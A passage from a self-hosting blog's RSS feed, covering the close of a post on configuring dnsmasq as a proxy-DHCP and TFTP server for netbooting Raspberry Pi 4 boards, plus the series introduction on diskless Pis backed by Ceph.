</span></span></code></pre></div><p>Again, as before, the <code>serial</code> is important here, providing a subdirectory
for each device on the NFS mount.</p>
<p>With this setup, whenever one of the netboot hosts is updated and files in
<code>/boot/firmware</code> are changed, they are also automatically changed on the TFTP
server, not requiring out-of-band synchronization of the TFTP server and the actual
host after an OS update.</p>
<h1 id="dnsmasq-and-tftp">DNSmasq and TFTP</h1>
<p>For the TFTP server, I chose <a href="https://thekelleys.org.uk/dnsmasq/doc.html">DNSmasq</a>.</p>
<p>This fulfills two different roles: The first one is to provide the DHCP option
telling the netbooting host where to find the TFTP server. The second function
is providing the TFTP server itself.</p>
<p>The configuration file for DNSmasq looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>port=0
</span></span><span style="display:flex;"><span>dhcp-range=10.86.5.255,proxy
</span></span><span style="display:flex;"><span>log-dhcp
</span></span><span style="display:flex;"><span>enable-tftp
</span></span><span style="display:flex;"><span>tftp-root=/mnt/netboot
</span></span><span style="display:flex;"><span>pxe-service=0,&#34;Raspberry Pi Boot&#34;
</span></span></code></pre></div><p>The <code>port=0</code> option is there to completely disable DNS functionality, as I have
got another DNS server already set up on my OPNsense firewall.</p>
<p>The <code>dhcp-range=10.86.5.255,proxy</code> config tells DNSmasq not to function as a
normal DHCP server. This ensures that there are no conflicts between your
network&rsquo;s main DHCP server and this DNSmasq instance. It will only answer with
netboot info, but will not hand out IPs to hosts.</p>
<p><code>log-dhcp</code> just enables a bit more logging.</p>
<p><code>enable-tftp</code> and <code>tftp-root=/mnt/netboot</code> configure DNSmasq&rsquo;s TFTP server for
providing the boot files, with the root for the files being set to the previously
configured NFS mount.
Finally, <code>pxe-service=0,&quot;Raspberry Pi Boot&quot;</code> provides a PXE boot option. The
<code>0</code> value here means that when the option is chosen in a boot menu, the netboot
will be aborted. This is not relevant for our Pi netboot case here, though.</p>
<p>After setting up this configuration, a full netboot will produce log output
like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>2408886387 available DHCP subnet: 10.86.5.255/255.255.255.0
</span></span><span style="display:flex;"><span>2408886387 vendor class: PXEClient:Arch:00000:UNDI:002001
</span></span><span style="display:flex;"><span>2408886387 PXE(eth0) e4:5f:01:98:e0:82 proxy
</span></span><span style="display:flex;"><span>2408886387 tags: eth0
</span></span><span style="display:flex;"><span>2408886387 broadcast response
</span></span><span style="display:flex;"><span>2408886387 sent size:  1 option: 53 message-type  2
</span></span><span style="display:flex;"><span>2408886387 sent size:  4 option: 54 server-identifier  10.86.5.152
</span></span><span style="display:flex;"><span>2408886387 sent size:  9 option: 60 vendor-class  50:58:45:43:6c:69:65:6e:74
</span></span><span style="display:flex;"><span>2408886387 sent size: 17 option: 97 client-machine-id  00:34:69:50:52:15:31:d0:00:01:98:e0:82:6f...
</span></span><span style="display:flex;"><span>2408886387 sent size: 32 option: 43 vendor-encap  06:01:03:0a:04:00:50:58:45:09:14:00:00:11...
</span></span><span style="display:flex;"><span>2408886387 available DHCP subnet: 10.86.5.255/255.255.255.0
</span></span><span style="display:flex;"><span>2408886387 vendor class: PXEClient:Arch:00000:UNDI:002001
</span></span><span style="display:flex;"><span>error 0 Early terminate received from 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/start4.elf to 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/config.txt to 10.86.5.151
</span></span><span style="display:flex;"><span>file /mnt/netboot/bf9fed6f/pieeprom.sig not found
</span></span><span style="display:flex;"><span>file /mnt/netboot/bf9fed6f/recover4.elf not found
</span></span><span style="display:flex;"><span>file /mnt/netboot/bf9fed6f/recovery.elf not found
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/start4.elf to 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/fixup4.dat to 10.86.5.151
</span></span><span style="display:flex;"><span>file /mnt/netboot/bf9fed6f/recovery.elf not found
</span></span><span style="display:flex;"><span>error 0 Early terminate received from 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/config.txt to 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/config.txt to 10.86.5.151
</span></span><span style="display:flex;"><span>file /mnt/netboot/bf9fed6f/dt-blob.bin not found
</span></span><span style="display:flex;"><span>file /mnt/netboot/bf9fed6f/recovery.elf not found
</span></span><span style="display:flex;"><span>error 0 Early terminate received from 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/config.txt to 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/config.txt to 10.86.5.151
</span></span><span style="display:flex;"><span>file /mnt/netboot/bf9fed6f/bootcfg.txt not found
</span></span><span style="display:flex;"><span>error 0 Early terminate received from 10.86.5.151
</span></span><span style="display:flex;"><span>failed sending /mnt/netboot/bf9fed6f/initrd.img to 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/initrd.img to 10.86.5.151
</span></span><span style="display:flex;"><span>error 0 Early terminate received from 10.86.5.151
</span></span><span style="display:flex;"><span>failed sending /mnt/netboot/bf9fed6f/bcm2711-rpi-4-b.dtb to 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/bcm2711-rpi-4-b.dtb to 10.86.5.151
</span></span><span style="display:flex;"><span>error 0 Early terminate received from 10.86.5.151
</span></span><span style="display:flex;"><span>failed sending /mnt/netboot/bf9fed6f/overlays/overlay_map.dtb to 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/overlays/overlay_map.dtb to 10.86.5.151
</span></span><span style="display:flex;"><span>error 0 Early terminate received from 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/config.txt to 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/config.txt to 10.86.5.151
</span></span><span style="display:flex;"><span>error 0 Early terminate received from 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/overlays/dwc2.dtbo to 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/overlays/dwc2.dtbo to 10.86.5.151
</span></span><span style="display:flex;"><span>error 0 Early terminate received from 10.86.5.151
</span></span><span style="display:flex;"><span>failed sending /mnt/netboot/bf9fed6f/overlays/disable-bt.dtbo to 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/overlays/disable-bt.dtbo to 10.86.5.151
</span></span><span style="display:flex;"><span>error 0 Early terminate received from 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/overlays/disable-wifi.dtbo to 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/overlays/disable-wifi.dtbo to 10.86.5.151
</span></span><span style="display:flex;"><span>error 0 Early terminate received from 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/cmdline.txt to 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/cmdline.txt to 10.86.5.151
</span></span><span style="display:flex;"><span>error 0 Early terminate received from 10.86.5.151
</span></span><span style="display:flex;"><span>failed sending /mnt/netboot/bf9fed6f/vmlinuz to 10.86.5.151
</span></span><span style="display:flex;"><span>file /mnt/netboot/bf9fed6f/armstub8-gic.bin not found
</span></span><span style="display:flex;"><span>error 0 Early terminate received from 10.86.5.151
</span></span><span style="display:flex;"><span>failed sending /mnt/netboot/bf9fed6f/vmlinuz to 10.86.5.151
</span></span><span style="display:flex;"><span>error 0 Early terminate received from 10.86.5.151
</span></span><span style="display:flex;"><span>failed sending /mnt/netboot/bf9fed6f/vmlinuz to 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/vmlinuz to 10.86.5.151
</span></span></code></pre></div><p>Important for us is the <code>2408886387 sent size:  4 option: 54 server-identifier  10.86.5.152</code>
message. It informs the client requesting netboot about where it can find the
TFTP server. In this case, this is just the IP of my local boot server.</p>
<p>Right after the DHCP message is send, file transfers for boot files start:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/start4.elf to 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/config.txt to 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/initrd.img to 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/bcm2711-rpi-4-b.dtb to 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/overlays/overlay_map.dtb to 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/overlays/dwc2.dtbo to 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/overlays/disable-bt.dtbo to 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/overlays/disable-wifi.dtbo to 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/cmdline.txt to 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/vmlinuz to 10.86.5.151
</span></span></code></pre></div><p>I&rsquo;m honestly still not sure where the <code>Early terminate</code> errors are coming from.
The file seems to be retried and succeed later, but I don&rsquo;t see any dropped
packets or similar.</p>
<p>This concludes the second part of the Pi netboot series. An overview of all
parts can be found in <a href="https://blog.mei-home.net/posts/rpi-netboot/intro/">Part I of the series</a>.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Netboot Raspberry Pi 4 Part I: Introduction</title>
      <link>https://blog.mei-home.net/posts/rpi-netboot/intro/</link>
      <pubDate>Mon, 25 Jul 2022 23:04:01 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/rpi-netboot/intro/</guid>
      <description>Overview of netbooting a Raspberry Pi 4</description>
      <content:encoded><![CDATA[<p>In this multipart series, I will be detailing how I set up a Raspberry Pi 4 to
netboot, with no local SD card/eMMC/other storage required.
The setup will use <a href="https://ceph.io">Ceph</a> to provide both, NFS storage for
the <code>/boot</code> partition, and an <a href="https://docs.ceph.com/en/latest/rbd/">RBD volume</a>
for the root disk. For the PXE netboot itself, <a href="https://thekelleys.org.uk/dnsmasq/doc.html">DNSmasq</a> will be used.</p>
<ul>
<li>Part II: <a href="https://blog.mei-home.net/posts/rpi-netboot/netboot-server/">The Netboot Server</a></li>
<li>Part III: <a href="https://blog.mei-home.net/posts/rpi-netboot/initramfs/">Telling Linux Where to Boot From</a></li>
<li>Part IV: <a href="https://blog.mei-home.net/posts/rpi-netboot/initramfs/">Using Packer and Ansible to create a Raspberry Pi Ubuntu Netboot Image</a></li>
<li>Part V: <a href="https://blog.mei-home.net/posts/rpi-netboot/playbook/">Ansible Playook</a></li>
<li>Part VI: <a href="https://blog.mei-home.net/posts/rpi-netboot/conclusion/">Conclusion</a></li>
</ul>
<h1 id="why-though">Why though?</h1>
<p>So why would you want a diskless Pi? First of all, the standard option for
Raspberry Pi storage is either an SD card or, for Pi CM4 modules, eMMC storage.
Both have the same downsides: Their performance is relatively slow, and they are
not very durable, wearing out relatively quickly under any but the lightest
write loads.</p>
<p>The next option is a disk attached via USB. Here I must admit that my main
aversion comes from previous problems related to choosing the right USB to SATA
adapter. Not all of them work well with Linux, or their <a href="https://en.wikipedia.org/wiki/USB_Attached_SCSI">UASP</a> support might not work under Linux, slowing down
your IO. In <a href="https://www.jeffgeerling.com/blog/2020/uasp-makes-raspberry-pi-4-disk-io-50-faster">this article</a>, Jeff Geerling measured a 50% increase in performance
from using UASP.</p>
<p>Finally: I&rsquo;m planning to set up a Pi Cluster with CM4 modules using the
<a href="https://turingpi.com/turing-pi-v2-is-here/">Turing Pi 2</a>. Buying a disk for
each of my Pis just seems like way too much cabling, way too much effort and
honestly way too much e-waste, compared to just buying a larger SSD and using
it off a Ceph cluster.</p>
<h1 id="assumptions">Assumptions</h1>
<p>This series will make one really big assumption that&rsquo;s probably not true for
most of you: That you have got access to a Ceph storage cluster.</p>
<p>I have personally become a big fan of Ceph ever since I first set it up
last year. It can provide the same disk space in three different formats:</p>
<ol>
<li>As Linux block devices which can be used and partitioned as any normal disk
would</li>
<li>As CephFS volumes, which is a POSIX compatible file system for direct
mounting with concurrent read/write on multiple hosts</li>
<li>As a S3 compatible service</li>
</ol>
<p>I really enjoy using it, and I would recommend it to any adventurous self hoster
looking for some fun with storage.</p>
<p>But I also realize that it&rsquo;s rather niche in the self hosting space. In the
article describing the root disk setup, I will try to also provide some hints
concerning using something else than Ceph RBD volumes for the Pi&rsquo;s root disk.</p>
<h1 id="setup">Setup</h1>
<p>The setup will be using multiple components.</p>
<p>The boot process will be looking like this:</p>
<ol>
<li>Get the TFTP server address from DNSmasq</li>
<li>Load the kernel, initramfs and config files from DNSmasq&rsquo;s TFTP server</li>
<li>Boot into the downloaded kernel and mount the initramfs</li>
<li>Mount the Ceph RBD root volume</li>
<li>Continue the boot process and mount the NFS based <code>/boot</code> directory</li>
</ol>
<p>First, the creation of an image with HashiCorp&rsquo;s <a href="https://www.packer.io/">Packer</a>
will be discussed. This is mostly a personal preference - I like to have
as much of the setup in code, so that my bad documentation habits bite me as
little as possible. The image creation will use the <a href="https://github.com/mkaczanowski/packer-builder-arm">packer-builder-arm</a> Packer builder to provision an Ubuntu server image and Ansible to do some basic configuration.
Any non-Ubuntu Linux distribution and any non-Packer way of creating an image
will be fine, I will try to keep it generic.</p>
<p>In the most interesting step, I will be discussing Linux initramfs and what
role it plays when doing a non-traditional boot. This was the most educational
part of this setup, as up until I set this up, the Linux initramfs always was
just this <em>magic</em> part of Linux which somehow did voodoo early boot things.
It turns out: No magic involved, just a compressed minimal root FS and some shell
scripting. &#x1f937;</p>
<p>In the next step, DNSmasq will be providing the actual netbooting capability,
providing two important components: A proxy DHCP server which will only provide
the netboot relevant options and the <a href="https://en.wikipedia.org/wiki/Trivial_File_Transfer_Protocol">TFTP</a> server delivering the necessary boot files. In the case
of the Raspberry Pi 4, these are the dtb files, the kernel and the initramfs
as well as the boot configuration file.
This part will also contain a brief overview of how to configure the Pi itself
for netbooting and how it behaves during netboots.</p>
<p>Finally, both the netboot server running DNSmasq and the individual Pis will
mount an NFS share with the <code>/boot</code> directory. On the netboot server, DNSmasq
will take the individual kernels and boot configs as well as initramfs from the
share.
The Pis, on the other hand, will mount subdirectories of the share as their
<code>/boot</code> dir. This ensures that during Os updates, the files used by the netboot
server are automatically updated.</p>
]]></content:encoded>
    </item>
  </channel>
</rss>
